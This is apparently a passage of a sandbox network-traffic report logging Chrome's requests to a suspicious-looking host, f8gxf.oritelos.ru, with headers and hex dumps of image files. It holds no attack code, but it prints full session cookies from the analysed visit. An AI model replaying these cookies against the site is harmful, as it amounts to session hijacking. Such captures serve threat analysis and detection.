                                                2024-05-30 10:21:12 UTC692INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                2024-05-30 10:21:12 UTC1179INData Raw: 31 39 38 2d 34 32 34 2e 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20
                                                Data Ascii: 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1"
                                                2024-05-30 10:21:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                41192.168.2.449791188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:11 UTC1464OUTGET /klIQ39laQFjey0i6xGLP3ZDteNpdd3cDZBKGgtt891okNrKdibFlqrS1cZWOM1UJUDFXOGwYKo5Fyz230 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:12 UTC672INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:12 GMT
                                                Content-Type: image/png
                                                Content-Length: 1400
                                                Connection: close
                                                Content-Disposition: inline; filename="klIQ39laQFjey0i6xGLP3ZDteNpdd3cDZBKGgtt891okNrKdibFlqrS1cZWOM1UJUDFXOGwYKo5Fyz230"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZvlMbg5PJ%2FvNHgbDJzAHrxDlVfsGnVVa1TyRq%2BvIj5tuMgpRV54ZgCIUqvZYpR7T0S0jHIve9qPCNSZ7QldKlvNfVuuufRybVQ7h4DgwuFd5bjMZ09ebNa1e0BLfFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfef34c9e433e-EWR
                                                2024-05-30 10:21:12 UTC697INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1 c2 dd 5e 82 67
                                                Data Ascii: PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?^g
                                                2024-05-30 10:21:12 UTC703INData Raw: e3 31 43 e6 07 18 cc 0f 49 f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0 73 91 99 b2 fa 1e 56 25 2d d6 3f 38 79 43 14 3f 6d 1a 1f b0 85 85 05 7a 09 15 9d 26 5d 5c 98 56 4e eb 73 1e 85 d0 f2 6a 12 60 c6 ea 19 02 6b 59 ad 82 05 0c fc 36 34 d4 59 10 ec ba 28 5f 65 61 5b e1 72 8c c8 1b 31 42 f8 e7 18 d9 1d bd 17 35 18 02 e9 c5 69 a1 75 a3 1c 16 bd fd 1e e6 61 51 f4 2b 7a b6 78 7f f4 2e fa 82 b3 82 3c 2c 7e 1a e6 61 cc 1d 10 7a 2c bc 49 85 54 87 62 da 50 ea 5e 08 60 ba 07 f2 8d 79 aa 35 38 0b 18 2c 7c 51 fb b7 bc 75 dd ab 2d 84 86 5f 95 97 ff fb 6d 85 31 1c e7 91 f6 7c 6b ac 6a 18 37 05 2c 78 f8 0b c0 96 00 58 f0 f0 17 80 65 7a b0 ef 61 04 8c 8d b4 58 de 00 8a 5c 45 98 24 80 15 2d f7 03
                                                Data Ascii: 1CIte~q&62B}*VpB"'MssV%-?8yC?mz&]\VNsj`kY64Y(_ea[r1B5iuaQ+zx.<,~az,ITbP^`y58,|Qu-_m1|kj7,xXezaX\E$-


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                42192.168.2.449792188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:11 UTC1424OUTGET /uvDdGeSZoeTtRzRnIUZPopyUbvj6WcjtQgkM34130 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:12 UTC637INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:12 GMT
                                                Content-Type: image/png
                                                Content-Length: 231
                                                Connection: close
                                                Content-Disposition: inline; filename="uvDdGeSZoeTtRzRnIUZPopyUbvj6WcjtQgkM34130"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cokQLFzHHKHWjZa8D1Y0DCByXv%2B%2BebDbcnYsLBjh4pVm7q0bC9FF0KxHQTWPpiBGTafm5bFY7Bl4QTaz6V%2BGRet5zAP%2B%2BYyG0ffnD06WHgXwPRBgXRadXHTVLT0NoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfef35b600f91-EWR
                                                2024-05-30 10:21:12 UTC231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                43192.168.2.449793188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:11 UTC1430OUTGET /opLQsPK25rFRhKntGwA2ZNghA8uNUx4nbVsIB5YEpt45139 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:12 UTC637INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:12 GMT
                                                Content-Type: image/png
                                                Content-Length: 727
                                                Connection: close
                                                Content-Disposition: inline; filename="opLQsPK25rFRhKntGwA2ZNghA8uNUx4nbVsIB5YEpt45139"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2B5AzAYPufeyHUjxthgGY7aCI1ZsdmgviIiMmkave90SrAuDw3sg8ZOndSaGtpRrda3BceMlFbb%2BnjrgtQ3pNewMEzLkKymi358FFJ2ImDJ1cN9QDa500Ubdpb7gPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfef368834273-EWR
                                                2024-05-30 10:21:12 UTC727INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b 32 14 5c 00 a2
                                                Data Ascii: PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk2\


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                44192.168.2.449797188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:12 UTC1145OUTGET /klIQ39laQFjey0i6xGLP3ZDteNpdd3cDZBKGgtt891okNrKdibFlqrS1cZWOM1UJUDFXOGwYKo5Fyz230 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:13 UTC672INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:13 GMT
                                                Content-Type: image/png
                                                Content-Length: 1400
                                                Connection: close
                                                Content-Disposition: inline; filename="klIQ39laQFjey0i6xGLP3ZDteNpdd3cDZBKGgtt891okNrKdibFlqrS1cZWOM1UJUDFXOGwYKo5Fyz230"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jLeT9n0xE%2FEK91aWP7ElaZbHXXvK9q5jNdA6WkSm5REdG3awTXcCZYARPPLIc3ovx2xV5CYSpdEcDxyQXIOTfT3G7%2Fdqt07Tkpt7maXi72AaOTFdZMjzrixF4NSwkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfefabf6d42ad-EWR
                                                2024-05-30 10:21:13 UTC697INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1 c2 dd 5e 82 67
                                                Data Ascii: PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?^g
                                                2024-05-30 10:21:13 UTC703INData Raw: e3 31 43 e6 07 18 cc 0f 49 f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0 73 91 99 b2 fa 1e 56 25 2d d6 3f 38 79 43 14 3f 6d 1a 1f b0 85 85 05 7a 09 15 9d 26 5d 5c 98 56 4e eb 73 1e 85 d0 f2 6a 12 60 c6 ea 19 02 6b 59 ad 82 05 0c fc 36 34 d4 59 10 ec ba 28 5f 65 61 5b e1 72 8c c8 1b 31 42 f8 e7 18 d9 1d bd 17 35 18 02 e9 c5 69 a1 75 a3 1c 16 bd fd 1e e6 61 51 f4 2b 7a b6 78 7f f4 2e fa 82 b3 82 3c 2c 7e 1a e6 61 cc 1d 10 7a 2c bc 49 85 54 87 62 da 50 ea 5e 08 60 ba 07 f2 8d 79 aa 35 38 0b 18 2c 7c 51 fb b7 bc 75 dd ab 2d 84 86 5f 95 97 ff fb 6d 85 31 1c e7 91 f6 7c 6b ac 6a 18 37 05 2c 78 f8 0b c0 96 00 58 f0 f0 17 80 65 7a b0 ef 61 04 8c 8d b4 58 de 00 8a 5c 45 98 24 80 15 2d f7 03
                                                Data Ascii: 1CIte~q&62B}*VpB"'MssV%-?8yC?mz&]\VNsj`kY64Y(_ea[r1B5iuaQ+zx.<,~az,ITbP^`y58,|Qu-_m1|kj7,xXezaX\E$-


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                45192.168.2.449795188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:12 UTC1138OUTGET /klpWKk32gxuOs7NipwmTvBAiwrwHsZdCtNCzija15cfNIJA8Jl2SAW0BE2ZBBrAhRNr49wx220 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:13 UTC681INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:13 GMT
                                                Content-Type: image/svg+xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Content-Disposition: inline; filename="klpWKk32gxuOs7NipwmTvBAiwrwHsZdCtNCzija15cfNIJA8Jl2SAW0BE2ZBBrAhRNr49wx220"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d12bJI85qjHjR9y%2BJZzPTMJd8NERd628asKU7qZ6%2FKfXhKmaUuCAHupIYTpDfoBA8WkidkJspuDktQ2TjDoGWL4MrJXNk5%2BUQ%2BWlQ5Xw79Imgl9mZnJZGUE%2FdjlXZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfefaccfd43e2-EWR
